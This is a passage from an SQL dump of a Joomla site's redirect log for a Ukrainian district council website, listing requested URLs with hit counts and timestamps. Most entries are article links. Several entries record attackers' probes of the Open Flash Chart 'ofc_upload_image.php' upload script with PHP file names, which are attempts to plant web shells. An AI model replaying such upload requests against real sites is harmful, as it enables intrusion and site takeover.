10:28:27','0000-00-00 00:00:00',301),(7353,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=840:-2007-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-08 10:35:49','0000-00-00 00:00:00',301),(7354,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1066:-23-&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-08 10:35:51','0000-00-00 00:00:00',301),(7355,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-08 11:04:02','0000-00-00 00:00:00',301),(7356,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-08 11:04:04','0000-00-00 00:00:00',301),(7357,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1064:2013-08-09-07-52-21&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-08 11:19:28','0000-00-00 00:00:00',301),(7358,'http://www.malyn-rayrada.org.ua/lxct/components/com_community/index.html','','','',1,0,'2014-10-08 11:25:25','0000-00-00 00:00:00',301),(7359,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=938:---------------6612-------626-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 11:57:31','0000-00-00 00:00:00',301),(7360,'http://malyn-rayrada.org.ua/index.php/--25072012-?start=10','','','',1,0,'2014-10-08 12:41:50','0000-00-00 00:00:00',301),(7361,'http://malyn-rayrada.org.ua//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=','','','',1,0,'2014-10-08 13:14:02','0000-00-00 00:00:00',301),(7362,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 13:18:11','0000-00-00 00:00:00',301),(7363,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1039:-l-r&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 13:34:34','0000-00-00 00:00:00',301),(7364,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1166:2014-01-06-08-21-04&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 13:34:37','0000-00-00 00:00:00',301),(7365,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1231:-q-q&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-08 13:41:27','0000-00-00 00:00:00',301),(7366,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1014:2013-06-03-06-43-44&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-08 14:03:38','0000-00-00 00:00:00',301),(7367,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1214:2014-02-18-09-51-45&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 14:06:57','0000-00-00 00:00:00',301),(7368,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1100:2013-10-02-18-03-10&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-08 14:10:11','0000-00-00 00:00:00',301),(7369,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46&Itemid=85&lang=uk','','','',6,0,'2014-10-08 14:43:11','0000-00-00 00:00:00',301),(7370,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&catid=48:--11032013-&id=955:2013-03-07-06-31-04&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 14:44:11','0000-00-00 00:00:00',301),(7371,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=918:----------2013-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-08 14:44:13','0000-00-00 00:00:00',301),(7372,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1188:2014-01-28-09-45-21&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-08 14:44:15','0000-00-00 00:00:00',301),(7373,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=en','','','',5,0,'2014-10-08 14:51:00','0000-00-00 00:00:00',301),(7374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:-2014-&catid=59:--20062014-&Itemid=107&lang=uk','','','',25,0,'2014-10-08 14:52:16','0000-00-00 00:00:00',301),(7375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-08 14:55:10','0000-00-00 00:00:00',301),(7376,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-10-08 14:55:54','0000-00-00 00:00:00',301),(7377,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56&Itemid=97&lang=uk','','','',5,0,'2014-10-08 15:02:23','0000-00-00 00:00:00',301),(7378,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=57&Itemid=98&lang=uk','','','',3,0,'2014-10-08 15:05:25','0000-00-00 00:00:00',301),(7379,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46&Itemid=85&lang=ru','','','',3,0,'2014-10-08 15:14:06','0000-00-00 00:00:00',301),(7380,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=923:-17-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 15:15:56','0000-00-00 00:00:00',301),(7381,'http://www.malyn-rayrada.org.ua/index.php?id=4&Itemid=8&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2014-10-08 15:17:17','0000-00-00 00:00:00',301),(7382,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=uk','','','',4,0,'2014-10-08 15:20:55','0000-00-00 00:00:00',301),(7383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-08 15:23:23','0000-00-00 00:00:00',301),(7384,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-08 15:30:32','0000-00-00 00:00:00',301),(7385,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-08 15:58:45','0000-00-00 00:00:00',301),(7386,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&lang=uk&option=com_content&view=article','','','',5,0,'2014-10-08 16:01:45','0000-00-00 00:00:00',301),(7387,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46:--21122012&Itemid=85&lang=ru','','','',3,0,'2014-10-08 16:12:43','0000-00-00 00:00:00',301),(7388,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1005:-7-1943-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 16:13:06','0000-00-00 00:00:00',301),(7389,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1220:2014-02-21-15-56-19&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 16:13:11','0000-00-00 00:00:00',301),(7390,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47&Itemid=86&lang=uk','','','',2,0,'2014-10-08 16:14:51','0000-00-00 00:00:00',301),(7391,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46:--21122012&Itemid=85&lang=uk','','','',3,0,'2014-10-08 16:28:22','0000-00-00 00:00:00',301),(7392,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:-3110&catid=59&Itemid=107&lang=en','','','',2,0,'2014-10-08 16:32:05','0000-00-00 00:00:00',301),(7393,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1336:2014-06-10-11-01-06&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-08 16:44:06','0000-00-00 00:00:00',301),(7394,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-10-08 16:56:19','0000-00-00 00:00:00',301),(7395,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47&Itemid=86&lang=ru','','','',2,0,'2014-10-08 17:06:18','0000-00-00 00:00:00',301),(7396,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=933:-2013-2017-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-08 17:15:28','0000-00-00 00:00:00',301),(7397,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=912:2013-01-22-14-14-06&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-08 17:15:30','0000-00-00 00:00:00',301),(7398,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=912:2013-01-22-14-14-06&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 17:15:32','0000-00-00 00:00:00',301),(7399,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-08 17:16:35','0000-00-00 00:00:00',301),(7400,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-10-08 17:22:36','0000-00-00 00:00:00',301),(7401,'http://www.malyn-rayrada.org.ua/index.php?id=6&Itemid=9&lang=ru&layout=blog&option=com_content&view=category','','','',3,0,'2014-10-08 17:42:35','0000-00-00 00:00:00',301),(7402,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=uk','','','',2,0,'2014-10-08 17:43:31','0000-00-00 00:00:00',301),(7403,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1012:l-r&lang=en&option=com_content&view=article','','','',5,0,'2014-10-08 17:43:54','0000-00-00 00:00:00',301),(7404,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=934:---------6---16112010-5---------------&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-08 17:43:57','0000-00-00 00:00:00',301),(7405,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51:--19072013-&Itemid=92&lang=ru','','','',6,0,'2014-10-08 17:47:33','0000-00-00 00:00:00',301),(7406,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-10-08 17:47:53','0000-00-00 00:00:00',301),(7407,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1075:2013-09-06-09-25-33&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 17:49:06','0000-00-00 00:00:00',301),(7408,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-10-08 17:50:51','0000-00-00 00:00:00',301),(7409,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58&Itemid=105&lang=en','','','',3,0,'2014-10-08 17:52:10','0000-00-00 00:00:00',301),(7410,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:------------2017-&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-10-08 17:54:46','0000-00-00 00:00:00',301),(7411,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-10-08 17:58:02','0000-00-00 00:00:00',301),(7412,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51&Itemid=92&lang=uk','','','',9,0,'2014-10-08 17:59:01','0000-00-00 00:00:00',301),(7413,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-10-08 18:01:42','0000-00-00 00:00:00',301),(7414,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58&Itemid=105&lang=en','','','',2,0,'2014-10-08 18:05:29','0000-00-00 00:00:00',301),(7415,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=ru','','','',3,0,'2014-10-08 18:15:07','0000-00-00 00:00:00',301),(7416,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=935:----------14-112012332-l------r&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-08 18:15:19','0000-00-00 00:00:00',301),(7417,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:------------2017-&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-10-08 18:22:58','0000-00-00 00:00:00',301),(7418,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51&Itemid=92&lang=ru','','','',3,0,'2014-10-08 18:28:25','0000-00-00 00:00:00',301),(7419,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51&Itemid=92&lang=ru','','','',3,0,'2014-10-08 18:28:26','0000-00-00 00:00:00',301),(7420,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58:--30042014-&Itemid=105&lang=en','','','',2,0,'2014-10-08 18:29:23','0000-00-00 00:00:00',301),(7421,'http://www.malyn-rayrada.org.ua/index.php?id=5&Itemid=6&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2014-10-08 18:40:43','0000-00-00 00:00:00',301),(7422,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1080:---------------l-r&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 18:46:09','0000-00-00 00:00:00',301),(7423,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-10-08 18:49:50','0000-00-00 00:00:00',301),(7424,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-10-08 19:02:00','0000-00-00 00:00:00',301),(7425,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=en&Itemid=0','','','',5,0,'2014-10-08 19:06:05','0000-00-00 00:00:00',301),(7426,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=en&Itemid=0','','','',5,0,'2014-10-08 19:06:26','0000-00-00 00:00:00',301),(7427,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-10-08 19:06:47','0000-00-00 00:00:00',301),(7428,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51&Itemid=92&lang=uk','','','',2,0,'2014-10-08 19:08:07','0000-00-00 00:00:00',301),(7429,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51&Itemid=92&lang=ru','','','',2,0,'2014-10-08 19:08:45','0000-00-00 00:00:00',301),(7430,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1212:2014-02-07-07-01-38&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-08 19:10:03','0000-00-00 00:00:00',301),(7431,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49&Itemid=88&lang=uk','','','',3,0,'2014-10-08 19:10:29','0000-00-00 00:00:00',301),(7432,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=petx.php','','','',1,0,'2014-10-08 19:11:42','0000-00-00 00:00:00',301),(7433,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=petx.php.phpgif','','','',1,0,'2014-10-08 19:11:55','0000-00-00 00:00:00',301),(7434,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cpx.php.phpgif','','','',1,0,'2014-10-08 19:12:00','0000-00-00 00:00:00',301),(7435,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51&Itemid=92&lang=ru','','','',7,0,'2014-10-08 19:12:16','0000-00-00 00:00:00',301),(7436,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49&Itemid=88&lang=uk','','','',3,0,'2014-10-08 19:14:27','0000-00-00 00:00:00',301),(7437,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-10-08 19:14:39','0000-00-00 00:00:00',301),(7438,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51:--19072013-&Itemid=92&lang=ru','','','',2,0,'2014-10-08 19:15:37','0000-00-00 00:00:00',301),(7439,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51&Itemid=92&lang=ru','','','',2,0,'2014-10-08 19:17:36','0000-00-00 00:00:00',301),(7440,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1013:2013-06-01-03-58-38&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-08 19:17:50','0000-00-00 00:00:00',301),(7441,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-10-08 19:19:41','0000-00-00 00:00:00',301),(7442,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-10-08 19:21:10','0000-00-00 00:00:00',301),(7443,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51:--19072013-&Itemid=92&lang=ru','','','',3,0,'2014-10-08 19:24:58','0000-00-00 00:00:00',301),(7444,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51:--19072013-&Itemid=92&lang=ru','','','',2,0,'2014-10-08 19:41:35','0000-00-00 00:00:00',301),(7445,'http://www.malyn-rayrada.org.ua/index.php?id=4&Itemid=8&lang=en&layout=blog&option=com_content&view=category','','','',5,0,'2014-10-08 19:48:50','0000-00-00 00:00:00',301),(7446,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-10-08 19:49:20','0000-00-00 00:00:00',301),(7447,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49&Itemid=88&lang=ru','','','',1,0,'2014-10-08 19:50:19','0000-00-00 00:00:00',301),(7448,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51:--19072013-&Itemid=92&lang=uk','','','',4,0,'2014-10-08 19:50:29','0000-00-00 00:00:00',301),(7449,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49:--12042013-&Itemid=88&lang=ru','','','',5,0,'2014-10-08 19:51:21','0000-00-00 00:00:00',301),(7450,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-10-08 19:59:09','0000-00-00 00:00:00',301),(7451,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=en&Itemid=0','','','',15,0,'2014-10-08 19:59:22','0000-00-00 00:00:00',301),(7452,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=47&Itemid=86&lang=uk','','','',2,0,'2014-10-08 20:02:03','0000-00-00 00:00:00',301),(7453,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51:--19072013-&Itemid=92&lang=ru','','','',1,0,'2014-10-08 20:02:04','0000-00-00 00:00:00',301),(7454,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38&Itemid=73&lang=uk','','','',2,0,'2014-10-08 20:03:11','0000-00-00 00:00:00',301),(7455,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51:--19072013-&Itemid=92&lang=uk','','','',1,0,'2014-10-08 20:04:57','0000-00-00 00:00:00',301),(7456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49&Itemid=88&lang=ru','','','',9,0,'2014-10-08 20:19:54','0000-00-00 00:00:00',301),(7457,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49&Itemid=88&lang=ru','','','',3,0,'2014-10-08 20:26:07','0000-00-00 00:00:00',301),(7458,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-10-08 20:31:19','0000-00-00 00:00:00',301),(7459,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2014-10-08 20:34:28','0000-00-00 00:00:00',301),(7460,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38:--19122011-&Itemid=73&lang=uk','','','',4,0,'2014-10-08 21:00:10','0000-00-00 00:00:00',301),(7461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=36&Itemid=70&lang=ru','','','',5,0,'2014-10-08 21:03:14','0000-00-00 00:00:00',301),(7462,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=uk','','','',5,0,'2014-10-08 21:28:00','0000-00-00 00:00:00',301),(7463,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=uk','','','',4,0,'2014-10-08 21:29:00','0000-00-00 00:00:00',301),(7464,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=uk','','','',4,0,'2014-10-08 21:30:31','0000-00-00 00:00:00',301),(7465,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=uk','','','',3,0,'2014-10-08 21:30:50','0000-00-00 00:00:00',301),(7466,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=uk','','','',4,0,'2014-10-08 21:30:51','0000-00-00 00:00:00',301),(7467,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-10-08 21:30:54','0000-00-00 00:00:00',301),(7468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=ru&Itemid=','','','',3,0,'2014-10-08 21:30:58','0000-00-00 00:00:00',301),(7469,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-10-08 21:31:32','0000-00-00 00:00:00',301),(7470,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-10-08 21:34:50','0000-00-00 00:00:00',301),(7471,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=uk','','','',5,0,'2014-10-08 21:35:17','0000-00-00 00:00:00',301),(7472,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-08 21:35:26','0000-00-00 00:00:00',301),(7473,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-08 21:50:25','0000-00-00 00:00:00',301),(7474,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=ru','','','',2,0,'2014-10-08 21:58:11','0000-00-00 00:00:00',301),(7475,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-08 21:58:56','0000-00-00 00:00:00',301),(7476,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-08 21:59:06','0000-00-00 00:00:00',301),(7477,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=ru','','','',4,0,'2014-10-08 22:02:18','0000-00-00 00:00:00',301),(7478,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-08 22:02:38','0000-00-00 00:00:00',301),(7479,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=ru','','','',2,0,'2014-10-08 22:04:01','0000-00-00 00:00:00',301),(7480,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-08 22:06:40','0000-00-00 00:00:00',301),(7481,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-08 22:21:37','0000-00-00 00:00:00',301),(7482,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-08 22:26:07','0000-00-00 00:00:00',301),(7483,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-10-08 22:37:03','0000-00-00 00:00:00',301),(7484,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-10-08 22:46:58','0000-00-00 00:00:00',301),(7485,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-08 22:53:59','0000-00-00 00:00:00',301),(7486,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-08 22:58:49','0000-00-00 00:00:00',301),(7487,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-08 23:02:44','0000-00-00 00:00:00',301),(7488,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49:--12042013-&Itemid=88&lang=ru','','','',2,0,'2014-10-08 23:06:22','0000-00-00 00:00:00',301),(7489,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49:--12042013-&Itemid=88&lang=uk','','','',2,0,'2014-10-08 23:21:25','0000-00-00 00:00:00',301),(7490,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=49&Itemid=88&lang=en','','','',2,0,'2014-10-08 23:30:14','0000-00-00 00:00:00',301),(7491,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-08 23:30:41','0000-00-00 00:00:00',301),(7492,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-08 23:30:45','0000-00-00 00:00:00',301),(7493,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-08 23:38:40','0000-00-00 00:00:00',301),(7494,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56:--03022014-&Itemid=97&lang=en','','','',5,0,'2014-10-08 23:39:58','0000-00-00 00:00:00',301),(7495,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-08 23:49:22','0000-00-00 